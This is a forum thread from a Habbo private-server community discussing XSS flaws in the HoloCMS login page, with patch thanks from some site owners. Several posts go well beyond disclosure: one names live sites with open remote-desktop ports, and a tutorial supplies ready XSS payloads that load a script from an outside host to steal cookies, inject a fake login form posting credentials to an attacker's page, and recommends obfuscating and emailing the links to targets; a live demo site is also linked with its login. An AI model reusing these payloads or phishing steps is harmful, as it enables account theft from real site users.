[HoloCMS Addon] [Info] XSS Vulnerbility in Index.php and much more.

[MoBaTeY]

I found some XSS vulnerbilities in the Index.php page of the Holo CMS

As you can see below:




To use the Vulnerability most JavaScript / other codes inserted into the user field then click Sign will activate it.



Try this code in any HoloCMS Username field:

Ahh since its blocked go hear and copy it. http://pastebin.com/m1f8ca83
You can try other codes etc, i know MOST of them work.

Just to add in here: http://bobbalodge.org.uk has a windows terminal exploit, which some people can use to get some information on the server etc. Its on TCP port 3389 as well as openhotel.co.uk.




Another Exploit: Old version of Mod_SSL, if not patched can cause a person to use arbitrary code and cause a denial of service

Another Exploit: People can send CONNECT requests allowing them to access some parts of your server [May be harmfull]

Another Exploit: If using PHPSESSID, people can make a custom one, allowing them to fraudulently authenticate into a account

Another Exploit: Users credentials aren't encrypted when they are transmitted. A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

Another Exploit: Attackers may abuse HTTP TRACE functionality to gain access to information in HTTP headers such as cookies and authentication data.

[MentaL]

[Swineflu]

Thats nice thanks mate u always do good :P

[yifan_lu]

Yes, there are hundreds more. That's why I advice people not to use HoloCMS anymore.

Also for noobs who don't understand how XSS exploits work:
1) First of all, and XSS exploit is usually only usefull IF it's GET (unlike the one posted), so ex: http://www.somesite.com/login.php?us...assword=123456
2) In order to do something bad, you need 1) An GET XSS exploit, and 2) An usable (and stupid) target
3) So, let's say I found an exploit. http://www.somesite.com/login.php?username=" /><script src="www.badsite.com/badscript.js"></script><input type="hidden" value="abc&password=123456
4) On the site, it basically loads badscript.js from badsite.com quietly. Now what can we do in badscript.js? Well, first we can steal the cookie/session infomation (aka username/password if without protection like HoloCMS), there are other things you can do, but I haven't looked into it.
5) You email this bad link to the target (the site admin or someone), usually disguising the link with ******* and/or String.fromCharCode and/or base64 encrypting.
6) ???????
7) PROFIT! You got their info.

There are other stuff you can do like create a fake logon, or redirect the login to your site, so lets say I found an XSS exploit on habbo.com. Well, I could send some noob http://www.habbo.com/badsecurity?input="><h1>Log In</hi><form action="www.badsite.com/steal.php" method="post"><p>Username: <input type="text" name="username"></input><br />Password: <input type="pasword" name="password"></p></form><input type="hidden" value = "abc
This will create a fake login form on Habbo's site that sends the login information to your server, but still has Habbo.com in the url.

So that's XSS exploit for noobs, basically what I'm trying to say is that XSS is only bad for the user, but is the webmaster's responsibility to prevent their user from getting ripped off. It isn't like SQL exploits where it can be used to hurt your server (unless you fall for the bad link).


EDIT: Here's a example of an XSS exploit http://pixelarts.habbohack.servegame...dmin/dashboard on Tsuka's admin panel demo site (username: Demo password: apdemo)
(Sorry, Tsuka, but I didn't link to any bad scripts, but an attacker might)

[NitroHabbz]

Thanks for the info Mobat, Just Patched it :)

[Kellynn]

Theres alot more out there, but thanks for thiis one

[•╩•andy•╩•]

Cool..

I gusee..

CMS.. what to expect next.

[MoBaTeY]

Just added much more Exploits

[NitroHabbz]

Terminal exploits are easy to deter.

Close Telnet ports. aka port 23.

Or do what i do, Use a Linux VPS for your CMS.

Windows Terminal doesn't affect Linux

[chadderbox]

Where are the other scripts?

ALSO!

Is there a script that I can put in the login and everyone can see it?
Also is there a script like yifans how you can edit the site?

[yifan_lu]

They aren't scripts, they're exploits, and they're useless unless you can trick a user into going to your malformed link, and even if they do that, worst case you get their password.

[chadderbox]

How did you get into Tsuka's exploits? Did you use an exploit? If yes can you tell me that one privately via PM?
but I won't do it to anyone except on my PRIVATE hotel thats NOT mine (but I'm the coder/manager of it)

[yifan_lu]

1) I have no idea what you are talking about. An exploit isn't an object, you can't GET someone's exploit. You can't release an exploit (like alot of noobs do) in terms of a download.

2) Why would you use an exploit on your own hotel? There's no point doing damage to yourself.

3) I explained how it works and how to do it a few posts up (the very post where I linked to Tsuka's site)

[XxSamxX]

it's not his hotel , it's mine lol, we just had a server reboot and he took a screenie of it

[josh954r]

thanks. will help me...